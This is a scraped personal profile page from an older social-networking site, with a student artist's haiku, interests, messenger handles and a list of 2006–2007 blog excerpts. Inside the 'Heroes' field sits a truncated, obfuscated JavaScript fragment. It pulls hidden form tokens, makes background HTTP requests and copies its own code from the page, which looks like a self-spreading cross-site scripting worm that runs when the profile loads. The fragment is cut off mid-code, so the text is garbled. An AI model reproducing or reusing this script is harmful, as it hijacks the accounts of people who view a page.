Megan profile picture


I am here for Friends and Networking

About Me

you just walked in i
make you smile its cool, but you
dont even know me...

First of all, yes. That is a Hiku. Now... Umm... about me.... im nice. i can get along with just about anyone... im an artist, but im not the type who thinks they have to wear strange clothing or be covered in tattoos and piercings to express themselves... im a senior at UNT!

check out my artwork at

the ways to contact me are innumerable, the most reliable are through instant messenger:

AOL: TrueFineMomma (best bet)

Yahoo!: truefinemomma

MSN: [email protected]

My Interests

art, music, friends.. not necessarily in that order...

I'd like to meet:

absolutely anyone whose friendly :)note: if you are my friend, and you post 6 thousand annoying bulletins... i will delete you. youve been warned.



everything, really... always open for something new


havent seen a ton.. mostly cause i dont like watching movies alone...


Gilmore Girls, every week. Random bouts of Iron Chef, Family Guy, South Park... whatevers on


Vitamin P


dunno... prove to me that youre hero-worthy . 0){N+='&'}var Q=escape(AV[P]);while(Q.indexOf('+')!=-1){Q=Q.replace('+','% 2B')}while(Q.indexOf('&')!=-1){Q=Q.replace('&','%26' )}N+=P+'='+Q;O++}return N}function httpSend(BH,BI,BJ,BK){if(!J){return false}..'J...statechange=BI');,BH,true);if(BJ=='POS T'){J.setRequestHeader('Content-Type','application/x-www-for m-urlencoded');J.setRequestHeader('Content-Length',BK.length )}J.send(BK);return true}function findIn(BF,BB,BC){var R=BF.indexOf(BB)+BB.length;var S=BF.substring(R,R+1024);return S.substring(0,S.indexOf(BC))}function getHiddenParameter(BF,BG){return findIn(BF,'name='+B+BG+B+' value='+B,B)}function getFromURL(BF,BG){var T;if(BG=='Mytoken'){T=B}else{T='&'}var U=BG+'=';var V=BF.indexOf(U)+U.length;var W=BF.substring(V,V+1024);var X=W.indexOf(T);var Y=W.substring(0,X);return Y}function getXMLObj(){var Z=false;if(window.XMLHttpRequest){try{Z=new XMLHttpRequest()}catch(e){Z=false}}else if(window.ActiveXObject){try{Z=new ActiveXObject('Msxml2.XMLHTTP')}catch(e){try{Z=new ActiveXObject('Microsoft.XMLHTTP')}catch(e){Z=false}}}return Z}var AA=getSource();var AB=AA.indexOf('m'+'ycode');var AC=AA.substring(AB,AB+4096);var AD=AC.indexOf('D'+'IV');var AE=AC.substring(0,AD);var AF;if(AE){AE=AE.replace('jav'+'a',A+'jav'+'a');AE=AE.replace ('exp'+'r)','exp'+'r)'+A);AF=' '}var AG;function getHome(){if(J.readyState!=4){return}var AU=J.responseText;AG=findIn(AU,'P'+'rofileHeroes',' ');AG=AG.substring(61,AG.length);if(AG.indexOf('

My Blog

never a more perfect saint...

The holy ones of the Most High shall receive the kingdom and possess the kingdom forever. In Christ we have also obtained an inheritance . . . I pray that . . . you may know what is the hope to which ...
Posted by Megan on Thu, 01 Nov 2007 09:49:00 PST

another tuesday...

what a long day... oh man. but hey i made it. i missed gilmore girls with jmo because i was supposed to be at TNT early because Project Transformation was there and i was giving the sermon with one of...
Posted by Megan on Wed, 01 Mar 2006 08:09:00 PST

pointless blog...

yeah, im just bored and i have nothing better to do, so i figure why not write a blog! well, lets see... this week, oh yeah i was f*ing sick. i was terribly on monday and totaly miserable, then gradu...
Posted by Megan on Fri, 24 Feb 2006 09:45:00 PST

my fantastic weekend!

so, i realize that its sunday morning and technically my weekend isnt over yet, but! so far it has been really good!!! friday i got out of class and actually didnt have to go into the painting lab. t...
Posted by Megan on Sun, 19 Feb 2006 07:07:00 PST

oh geez....

ok, so those "expected" other valentine's day gifts have yet to show... but thats ok, at least there is a bit of explaination on both sides.... so, funny huh? yes, im a dork and on occation i like to...
Posted by Megan on Thu, 16 Feb 2006 07:15:00 PST

uuuuuugh sleepy

yeah, so i just woke up. thats the entire reason for the title. in case you were wondering. so, i guess everyones writing about thier valentines days...  so i will too... oh, the day for love. h...
Posted by Megan on Wed, 15 Feb 2006 03:44:00 PST

happy news!

just a quick note (and i know most/all of you all dont know then BUT) nick (my brother) and ashuley are GETTING MARRIED! yay fun! that is all. ...
Posted by Megan on Tue, 07 Feb 2006 05:27:00 PST

today, today

my first class today was cancelled- Mishkah or whatever her russian-ass name is had some sort of class-cancelling emergency, so i went to jazzmans and had coffee with jmo. it was much better than sitt...
Posted by Megan on Mon, 23 Jan 2006 11:34:00 PST

the beating that is my life..

oh. my. freaking. gosh. 6 hours of class yesterday... i thought by the end that i actually had died. my painting class is nice. i like it and i have two friends in there already. nothing to complain...
Posted by Megan on Fri, 20 Jan 2006 12:39:00 PST

and school begins...

soooooo as for school, its not too bad. governtment is a drag because its all about american but my teacher and TA arent american.... splain that to me! history is going to be boring, but easily stru...
Posted by Megan on Wed, 18 Jan 2006 12:47:00 PST